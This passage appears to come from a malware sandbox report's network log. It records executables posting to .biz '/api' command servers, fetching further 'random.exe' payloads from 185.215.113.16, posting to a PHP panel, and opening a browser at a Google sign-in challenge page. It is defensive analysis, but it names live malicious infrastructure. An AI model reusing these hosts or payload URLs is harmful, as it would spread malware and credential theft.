                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuOaq6kp5cCwHqEXIsu0KHwZS6GEZrM3JBdUC7xBDKf0puCJ%2FpfPfG4su25vrEULToqgCk4acHtsrptJRon6Pc3BsLa%2BEvL18OfLLiqYndKfntdr1u7epYR1dLNdWfcx8w0%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc202fc69461-LHR
                  • [US] POST https://zinc-sneark.biz/api (0tClIDb.exe), remote address 104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Cookie: __cf_mw_byp=At1DrMkQJcWUu_7DjA9hMMLEpw.q8_TqJ0KPKb_8Ec8-1733682974-0.0.1.1-/api
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 48
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=q98id6vupbtuld0s2f9a4pdb44; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7c9O0NZF1Kc0pSsdS27kPqv4r%2FiE7qPBkRdaLfrhdl9Tf81iW2CP8PY0P507u9oHfMXAclltZyz5sg13Dkf%2FM2uwNxgd0GE%2Fmr2CZTgUJ9hmGLBwpZXMhqDDlhINBu9yL%2Fg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc2119059461-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=64066&min_rtt=48282&rtt_var=29414&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8126&recv_bytes=1057&delivery_rate=140789&cwnd=254&unsent_bytes=0&cid=77cecd6feea6960d&ts=429&x=0"
                  • [RU] GET http://185.215.113.16/luma/random.exe (skotes.exe), remote address 185.215.113.16:80
                    Request
                    GET /luma/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:36 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1866240
                    Last-Modified: Sun, 08 Dec 2024 17:40:04 GMT
                    Connection: keep-alive
                    ETag: "6755d9f4-1c7a00"
                    Accept-Ranges: bytes
                  • [RU] GET http://185.215.113.16/steam/random.exe (skotes.exe), remote address 185.215.113.16:80
                    Request
                    GET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1783296
                    Last-Modified: Sun, 08 Dec 2024 17:40:11 GMT
                    Connection: keep-alive
                    ETag: "6755d9fb-1b3600"
                    Accept-Ranges: bytes
                  • [RU] GET http://185.215.113.16/well/random.exe (skotes.exe), remote address 185.215.113.16:80
                    Request
                    GET /well/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:43 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 970752
                    Last-Modified: Sun, 08 Dec 2024 17:38:16 GMT
                    Connection: keep-alive
                    ETag: "6755d988-ed000"
                    Accept-Ranges: bytes
                  • [RU] GET http://185.215.113.16/off/random.exe (skotes.exe), remote address 185.215.113.16:80
                    Request
                    GET /off/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:46 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2854912
                    Last-Modified: Sun, 08 Dec 2024 17:38:42 GMT
                    Connection: keep-alive
                    ETag: "6755d9a2-2b9000"
                    Accept-Ranges: bytes
                  • [US] POST https://atten-supporse.biz/api (78c83a40ec.exe), remote address 104.21.16.9:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=4gq1rraha9jq7s4s75ir7n23n4; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ha%2Bvr9%2BOIcnzTa0U5y1ZhpFkXtP1Ry630y5tmNaKrKphJGpwqi064u9mULzEoSuOSzkYbHwbURxPvmn1YQlkNfXHuVYXg5yO%2BCgGePIHWCzlivvFnQP7TeqsvkBceHeH2N%2BrDTM%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcb809e660f8-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=62483&min_rtt=47850&rtt_var=25389&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=586&delivery_rate=74575&cwnd=246&unsent_bytes=0&cid=f8dc910aa0a51a3d&ts=303&x=0"
                  • [US] POST https://se-blurry.biz/api (78c83a40ec.exe), remote address 172.67.162.65:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: se-blurry.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=i0k3oll30kmtempvmpbmv4lgir; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7rnkISQmloSjc9T6ZYOnzM70MHh2sIx%2FQ%2BsyHgoN%2Bu9VEDDoDmf4UCQOFtoLN8rrM47mDFoUb6V57oDgqIIWVTCqykSV5uJOctA7B89qWXkygV5%2BNssbaHLtfdjJM%2BGd"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcba6e76bec8-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=58718&min_rtt=54370&rtt_var=18143&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=58514&cwnd=253&unsent_bytes=0&cid=2ae8e32f3cf009fc&ts=455&x=0"
                  • [US] POST https://zinc-sneark.biz/api (78c83a40ec.exe), remote address 104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 403 Forbidden
                    Date: Sun, 08 Dec 2024 18:36:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DxqFYuJp9kmoOGXyncevmgWZheZhFbfyEqxNbVUCAfc6pUW%2B4Ng4MjSO9AZ0gBtf%2FZ0hhCDwrJJLIs376z0g3anMazv7%2F%2BoMaoFQLz1HmFAfqiOQ0S%2BgqbIn2%2BWoYXURpo4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcbdcd589514-LHR
                  • [US] POST https://zinc-sneark.biz/api (78c83a40ec.exe), remote address 104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Cookie: __cf_mw_byp=QQKy5ulQguZXcwrxlwsnWBU2JLO3safH5Bvix7.KTg4-1733682999-0.0.1.1-/api
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 53
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=h3jjvt916901hfgd5rp1mr4bae; expires=Thu, 03-Apr-2025 12:23:19 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FK1GilmItNpRt%2Fyc2oWGpfuc1Dy33EGeI%2Bo7huOIwTGOFIYwqcAjjLbV1qSWCqlpkFDtx%2FHO9ZDR6greBmyRt8WJVR91paDc8eg0d6FSzvXw%2BL5kX0M5QcBf3sSgZyqKLLA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedcbe5e2b9514-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50580&min_rtt=48471&rtt_var=7121&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8128&recv_bytes=1057&delivery_rate=164944&cwnd=251&unsent_bytes=0&cid=f7e27591555fec1f&ts=963&x=0"
                  • [RU] GET http://185.215.113.206/ (2427caf3c8.exe), remote address 185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:42 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • [RU] POST http://185.215.113.206/c4becf79229cb002.php (2427caf3c8.exe), remote address 185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:42 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • [US] DNS youtube.com (firefox.exe), remote address 8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • [US] DNS spocs.getpocket.com (firefox.exe), remote address 8.8.8.8:53
                    Request
                    spocs.getpocket.com
                    IN A
                    Response
                    spocs.getpocket.com
                    IN CNAME
                    prod.ads.prod.webservices.mozgcp.net
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • [US] DNS getpocket.cdn.mozilla.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    getpocket.cdn.mozilla.net
                    IN A
                    Response
                    getpocket.cdn.mozilla.net
                    IN CNAME
                    getpocket-cdn.prod.mozaws.net
                    getpocket-cdn.prod.mozaws.net
                    IN CNAME
                    prod.pocket.prod.cloudops.mozgcp.net
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • [GB] GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd (firefox.exe), remote address 216.58.213.14:443
                    Request
                    GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                    host: youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • [US] GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 (firefox.exe), remote address 34.120.5.221:443
                    Request
                    GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                    host: getpocket.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    sec-fetch-dest: empty
                    sec-fetch-mode: cors
                    sec-fetch-site: cross-site
                    if-none-match: W/"5395-zuqlHshIosLNxsVZ1yDB7WQXaJg"
                    te: trailers
                  • [US] DNS youtube.com (firefox.exe), remote address 8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • [US] DNS prod.ads.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • [US] DNS prod.ads.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • [US] DNS youtube.com (firefox.exe), remote address 8.8.8.8:53
                    Request
                    youtube.com
                    IN AAAA
                    Response
                    youtube.com
                    IN AAAA
                    2a00:1450:4009:816::200e
                  • [US] DNS prod.pocket.prod.cloudops.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • [US] DNS prod.content-signature-chains.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • [US] DNS shavar.prod.mozaws.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    52.33.231.145
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                  • [US] DNS prod.pocket.prod.cloudops.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    2600:1901:0:524c::
                  • [US] DNS prod.content-signature-chains.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:92a9::
                  • [US] DNS shavar.prod.mozaws.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN AAAA
                    Response
                  • [US] DNS prod.remote-settings.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.149.100.209
                  • [US] DNS prod.remote-settings.prod.webservices.mozgcp.net (firefox.exe), remote address 8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • [US] DNS www.youtube.com (firefox.exe), remote address 8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                  • [GB] GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd (firefox.exe), remote address 142.250.180.14:443
                    Request
                    GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                    host: www.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • [GB] GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 (firefox.exe), remote address 142.250.180.14:443
                    Request
                    GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                    host: consent.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: SOCS=CAAaBgiAw9O6Bg
                    cookie: YSC=_SG0yO8EYcE
                    cookie: __Secure-YEC=CgtZMVJuN0JKU1RHMCjBzte6BjIKCgJHQhIEGgAgRA%3D%3D
                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRA%3D%3D
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN A
                    Response
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN AAAA
                    Response
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:815::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:821::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:820::200e
                  • flag-us
                    DNS
                    firefox-settings-attachments.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-settings-attachments.cdn.mozilla.net
                    IN A
                    Response
                    firefox-settings-attachments.cdn.mozilla.net
                    IN CNAME
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN AAAA
                    Response
                    consent.youtube.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-gb
                    GET
                    https://www.google.com/favicon.ico
                    firefox.exe
                    Remote address:
                    142.250.187.196:443
                    Request
                    GET /favicon.ico HTTP/2.0
                    host: www.google.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: image/avif,image/webp,*/*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    sec-fetch-dest: image
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN AAAA
                    Response
                    www.google.com
                    IN AAAA
                    2a00:1450:4009:81f::2004
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                  • flag-gb
                    GET
                    http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                    firefox.exe
                    Remote address:
                    88.221.134.155:80
                    Request
                    GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                    Host: ciscobinary.openh264.org
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                    ETag: 85430baed3398695717b0263807cf97c
                    Content-Length: 453023
                    Accept-Ranges: bytes
                    X-Timestamp: 1731034347.00215
                    Content-Type: application/zip
                    X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                    Cache-Control: public, max-age=151658
                    Expires: Tue, 10 Dec 2024 12:44:56 GMT
                    Date: Sun, 08 Dec 2024 18:37:18 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                    Response
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.180.14
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.180.14
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN AAAA
